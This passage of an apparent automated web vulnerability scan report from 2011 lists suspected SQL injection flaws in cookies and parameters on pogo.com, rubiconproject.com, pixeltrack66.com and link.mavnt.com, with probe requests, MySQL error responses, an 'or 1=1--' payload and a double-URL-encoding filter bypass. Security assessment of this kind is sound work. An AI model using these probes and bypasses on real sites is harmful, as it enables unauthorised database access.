HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:37 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 682 Content-Type: text/html <br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 ...[SNIP]... |
Request 2
GET /1x1_map.php?51270'' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:39 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Content-Type: image/gif GIF89a................... |
1.12. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://link.mavnt.com |
Path: | /1x1_map.php |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.Request 1
GET /1x1_map.php?1'=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 675 Connection: close Content-Type: text/html <br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 /var/d ...[SNIP]... |
Request 2
GET /1x1_map.php?1''=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Connection: close Content-Type: image/gif GIF89a................... |
1.13. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ses15 cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://optimized-by |
Path: | /a/4252/4762/6670-15.js |
Issue detail
The ses15 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ses15 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /a/4252/4762/6670-15.js Host: optimized-by.rubicon Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ses15=4762^2'; au=GIP9HWY4-MADS-10.208 |
Response 1
HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html <html><body><h1>504 Gateway Time-out</h1> The server didn't respond in time. </body></html> |
Request 2
GET /a/4252/4762/6670-15.js Host: optimized-by.rubicon Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ses15=4762^2''; au=GIP9HWY4-MADS-10.208 |
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:25:40 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106459; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^2 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3188204" ...[SNIP]... |
1.14. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [rsid cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://optimized-by |
Path: | /a/4252/4762/6942-2.js |
Issue detail
The rsid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rsid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /a/4252/4762/6942-2.js?cb Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response 1
HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html <html><body><h1>504 Gateway Time-out</h1> The server didn't respond in time. </body></html> |
Request 2
GET /a/4252/4762/6942-2.js?cb Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:25:54 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:54 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=0; expires=Sun, 09-Jan-2011 03:25:54 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106445; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3156581.js^1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2284 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3156581" ...[SNIP]... |
1.15. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 [mt_clk cookie] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pixeltrack66 |
Path: | /mt/03745344/&subid1 |
Issue detail
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.Request 1
GET /mt/03745344/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:13:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0 |
Request 2
GET /mt/03745344/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response 2
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Location: http://www.yourpurec Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
1.16. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 [mt_clk cookie] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pixeltrack66 |
Path: | /mt/03745344/&subid1 |
Issue detail
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.Request 1
GET /mt/03745344/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:14:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0 |
Request 2
GET /mt/03745344/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response 2
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Location: http://www.yourpurec Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
1.17. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= [mt_clk cookie] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pixeltrack66 |
Path: | /mt/x2a40344g4q2/&subid1 |
Issue detail
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.Request 1
GET /mt/x2a40344g4q2/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:14:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0 |
Request 2
GET /mt/x2a40344g4q2/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response 2
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Location: http://www.socialtrack Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
1.18. http://www.pogo.com/ [com.pogo.ga cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.pogo.com |
Path: | / |
Issue detail
The com.pogo.ga cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.ga cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /?pageSection=homnav_logo HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:57:16 GMT Server: Apache-Coyote/1.1 Content-Length: 430000 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... reg/signin.do', { method : 'get', data : 'returnType=&returnValue= onSuccess: function(responseText) { var forwardUrl = responseText; window.location = forwardUrl; }, onFailure: function () { alert('Could not log you in'); MootoolsUtils.dispose($( } }); } </script> ...[SNIP]... <a href="http://puzzle-games ...[SNIP]... |
Request 2
GET /?pageSection=homnav_logo HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Location: http://www.pogo.com/login Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:57:18 GMT Server: Apache-Coyote/1.1 |
1.19. http://www.pogo.com/action/pogop/welcome.do [com.pogo.info cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.pogo.com |
Path: | /action/pogop/welcome.do |
Issue detail
The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request 1
GET /action/pogop/welcome.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:55:51 GMT Server: Apache-Coyote/1.1 Content-Length: 35534 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... reg/signin.do', { method : 'get', data : 'returnType=&returnValue= onSuccess: function(responseText) { var forwardUrl = responseText; window.location = forwardUrl; }, onFailure: function () { alert('Could not log you in'); MootoolsUtils.dispose($( } }); } </script> ...[SNIP]... Bowling,Sci-Fi Slots,SCRABBLE,SCRABBLE Cubes,Scrabble Tour,Showbiz Slots,Showbiz Slots II,Shuffle Bump,Shutter Island,Slingo,Sock Hop Slots,Solitaire Rush,Spades,Spider Solitaire,Spin Win,Squelchies,Stack 'em,Stellar Sweeper,Sudoku Classic,Sudoku Puzzle Blast,Sudoku Quest,Super Dominoes,Swashbucks ...[SNIP]... |
Request 2
GET /action/pogop/welcome.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Location: http://www.pogo.com Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:55:51 GMT Server: Apache-Coyote/1.1 |
1.20. http://www.pogo.com/home/home.jsp [com.pogo.info cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.pogo.com |
Path: | /home/home.jsp |
Issue detail
The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request 1
GET /home/home.jsp?sls=2&site Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:48:48 GMT Server: Apache-Coyote/1.1 Content-Length: 429485 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... reg/signin.do', { method : 'get', data : 'returnType=&returnValue= onSuccess: function(responseText) { var forwardUrl = responseText; window.location = forwardUrl; }, onFailure: function () { alert('Could not log you in'); MootoolsUtils.dispose($( } }); } </script> ...[SNIP]... <a href="http://puzzle-games ...[SNIP]... |
Request 2
GET /home/home.jsp?sls=2&site Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 2
HTTP/1.1 301 Moved Permanently Location: /?sls=2&site=pogo Content-Length: 0 Date: Sun, 09 Jan 2011 01:48:49 GMT Server: Apache-Coyote/1.1 |
1.21. http://www.pogo.com/home/home.jsp [com.pogo.unid cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.pogo.com |
Path: | /home/home.jsp |
Issue detail
The com.pogo.unid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.unid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.unid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request 1
GET /home/home.jsp?sls=2&site Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.unid=660648 Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:59:21 GMT Server: Apache-Coyote/1.1 Content-Length: 429534 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... reg/signin.do', { method : 'get', data : 'returnType=&returnValue= onSuccess: function(responseText) { var forwardUrl = responseText; window.location = forwardUrl; }, onFailure: function () { alert('Could not log you in'); MootoolsUtils.dispose($( } }); } </script> ...[SNIP]... <a href="http://puzzle-games ...[SNIP]... |
Request 2
GET /home/home.jsp?sls=2&site Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.unid=660648 Location: http://www.pogo.com/login Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:59:22 GMT Server: Apache-Coyote/1.1 |
1.22. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [s_cc cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/promotions |
Issue detail
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response 1
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:59:22 GMT Server: Apache-Coyote/1.1 Content-Length: 21303 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Co ...[SNIP]... reg/signin.do', { method : 'get', data : 'returnType=&returnValue= onSuccess: function(responseText) { var forwardUrl = responseText; window.location = forwardUrl; }, onFailure: function () { alert('Could not log you in'); MootoolsUtils.dispose($( } }); } </script> ...[SNIP]... |
Request 2
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response 2
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Location: http://www.pogo.com/login Content-Length: 0 Date: Sun, 09 Jan 2011 02:59:23 GMT Server: Apache-Coyote/1.1 |
1.23. http://www.pogo.com/img/prize/en_US/cash-giveaway [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.pogo.com |
Path: | /img/prize/en_US/cash |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19192500'%20or%201%3d1--Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /img/prize/en_US/cash Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response 1
HTTP/1.1 404 /img/prize/en_US/cash Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:58:59 GMT Server: Apache-Coyote/1.1 Content-Length: 3797 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof(omniture_java if (typeof(omniture_plugin s.eVar10=s.getTimeParting var s_code=s.t();if(s_code //--></script> </div> <!-- end of Omniture Tag --> <div class="clear20"></div> <div align="center"> <img src="/vl/img/header/main <div id="bodyWrap"> <div class="whiteModule" id="pageHeader"> <b class="tL"> </b><b class="tR"> </b> <div class="moduleContent"> Oops, something is not right... </div> <b class="bL"> </b><b class="bR"> </b> </div> <div class="clear10"></div> <div class="whiteModule mainContent"> <b class="tL"> </b><b class="tR"> </b> <div class="moduleContent"> <h1>The page you requested could not be found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br /> <strong><a href="http://www.pogo.com <div class="clear20"></div> </div> <b class="bL"> </b><b class="bR"> </b> </div> </div> </div> </body> </html> |
Request 2
GET /img/prize/en_US/cash Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response 2
HTTP/1.1 404 /img/prize/en_US/cash Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:58:59 GMT Server: Apache-Coyote/1.1 Content-Length: 3784 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof(omniture_java if (typeof(omniture_plugin s.eVar10=s.getTimeParting var s_code=s.t();if(s_code //--></script> </div> <!-- end of Omniture Tag --> <div class="clear20"></div> <div align="center"> <img src="/vl/img/header/main <div id="bodyWrap"> <div class="whiteModule" id="pageHeader"> <b class="tL"> </b><b class="tR"> </b> <div class="moduleContent"> Oops, something is not right... </div> <b class="bL"> </b><b class="bR"> </b> </div> <div class="clear10"></div> <div class="whiteModule mainContent"> <b class="tL"> </b><b class="tR"> </b> <div class="moduleContent"> <h1>The page you requested could not be found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br /> <strong><a href="http://www.pogo.com <div class="clear20"></div> </div> <b class="bL"> </b><b class="bR"> </b> </div> </div> </div> </body> </html> |
1.24. http://www.pogo.com/prize/prize.do [com.pogo.hp.ls.cfg cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.pogo.com |
Path: | /prize/prize.do |
Issue detail
The com.pogo.hp.ls.cfg cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.hp.ls.cfg cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /prize/prize.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 1 (redirected)
